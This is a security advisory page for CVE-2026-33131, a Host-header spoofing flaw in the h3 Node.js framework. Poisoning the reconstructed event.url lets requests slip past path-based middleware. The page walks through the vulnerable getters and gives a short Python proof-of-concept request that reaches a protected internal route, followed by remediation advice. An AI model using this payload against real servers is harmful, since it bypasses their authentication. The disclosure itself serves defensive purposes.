Skip to main content

CVE-2026-33131

HIGH
Authentication Bypass by Spoofing (CWE-290)
2026-03-18 https://github.com/h3js/h3 GHSA-3vj8-jmxq-cgj5
7.4
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
7.4 HIGH
AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
Attack Vector
Network
Attack Complexity
High
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
None

Lifecycle Timeline

3
Patch released
Mar 31, 2026 - 21:13 nvd
Patch available
Analysis Generated
Mar 18, 2026 - 16:30 vuln.today
CVE Published
Mar 18, 2026 - 16:18 nvd
HIGH 7.4

DescriptionGitHub Advisory

H3 NodeRequestUrl bugs

Vulnerable pieces of code :

js
import { H3, serve, defineHandler, getQuery, getHeaders, readBody, defineNodeHandler } from "h3";
let app = new H3()

const internalOnly = defineHandler((event, next) => {
  const token = event.headers.get("x-internal-key");

  if (token !== "SUPERRANDOMCANNOTBELEAKED") {
    return new Response("Forbidden", { status: 403 });
  }

  return next();
});
const logger = defineHandler((event, next) => {
    console.log("Logging : " +  event.url.hostname)
    return next()
})
app.use(logger);
app.use("/internal/run", internalOnly);


app.get("/internal/run", () => {
  return "Internal OK";
});

serve(app, { port: 3001 });

The middleware is super safe now with just a logger and a middleware to block internal access. But there's one problems here at the logger . When it log out the `event.url` or `event.url.hostname` or `event.url._url`

It will lead to trigger one specials method

js
// _url.mjs FastURL
get _url() {
    if (this.#url) return this.#url;
    this.#url = new NativeURL(this.href);
    this.#href = void 0;
    this.#protocol = void 0;
    this.#host = void 0;
    this.#pathname = void 0;
    this.#search = void 0;
    this.#searchParams = void 0;
    this.#pos = void 0;
    return this.#url;
}

The NodeRequestUrl is extends from FastURL so when we just access `.url` or trying to dump all data of this class . This function will be triggered !!

And as debugging , the this.#url is null and will reach to this code :

js
 this.#url = new NativeURL(this.href);

Where is the this.href comes from ?

js
get href() {
    if (this.#url) return this.#url.href;
    if (!this.#href) this.#href = `${this.#protocol || "http:"}//${this.#host || "localhost"}${this.#pathname || "/"}${this.#search || ""}`;
    return this.#href;
}

Because the this.#url is still null so this.#href is built up by :

js
if (!this.#href) this.#href = `${this.#protocol || "http:"}//${this.#host || "localhost"}${this.#pathname || "/"}${this.#search || ""}`;

Yeah and this is untrusted data go . An attacker can pollute the Host header from requests lead overwrite the event.url .

Middleware bypass

What can be done with overwriting the event.url? Audit the code we can easily realize that the routeHanlder is found before running any middlewares

js
handler(event) {
    const route = this["~findRoute"](event);
    if (route) {
        event.context.params = route.params;
        event.context.matchedRoute = route.data;
    }
    const routeHandler = route?.data.handler || NoHandler;
    const middleware = this["~getMiddleware"](event, route);
    return middleware.length > 0 ? callMiddleware(event, middleware, routeHandler) : routeHandler(event);
}

So the handleRoute is fixed but when checking with middleware it check with the spoofed one lead to MIDDLEWARE BYPASS

We have this poc :

py
import requests
url = "http://localhost:3000"
headers = {
    "Host":f"localhost:3000/abchehe?"
}
res = requests.get(f"{url}/internal/run",headers=headers)
print(res.text)

This is really dangerous if some one just try to dump all the event.url or something that trigger _url() from class FastURL and need a fix immediately.

AnalysisAI

A Host header manipulation vulnerability in the h3 Node.js web framework allows attackers to bypass authentication middleware by polluting the event.url object. The vulnerability affects h3 npm package and allows unauthorized access to protected routes by crafting malicious Host headers that trigger internal URL reconstruction logic. A working proof-of-concept exploit is publicly available demonstrating the authentication bypass.

Technical ContextAI

The vulnerability exists in h3's FastURL and NodeRequestUrl implementation (pkg:npm/h3). When code accesses event.url properties like hostname or attempts to serialize the URL object, it triggers the _url() getter method which reconstructs the URL from untrusted HTTP headers. The href getter builds the URL string using this.#protocol, this.#host, this.#pathname, and this.#search without proper validation. Since route handlers are resolved before middleware execution but middleware path matching uses the polluted event.url, attackers can manipulate the Host header to cause middleware to evaluate against a different path than the actual route being handled. This represents CWE-290 (Authentication Bypass by Spoofing) where improper input validation of HTTP headers leads to security control bypass.

RemediationAI

Upgrade to the patched version of h3 as specified in the GitHub Security Advisory at https://github.com/h3js/h3/security/advisories/GHSA-3vj8-jmxq-cgj5. Until patching is possible, avoid accessing event.url, event.url.hostname, or any properties that trigger the _url() getter in middleware or logging code. Implement Host header validation at the reverse proxy or load balancer level to reject requests with malformed Host headers containing path characters. Additionally, review all authentication middleware to ensure it operates on trusted request properties rather than client-controllable headers, and consider implementing defense-in-depth controls such as IP allowlisting for internal endpoints.

Share

CVE-2026-33131 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy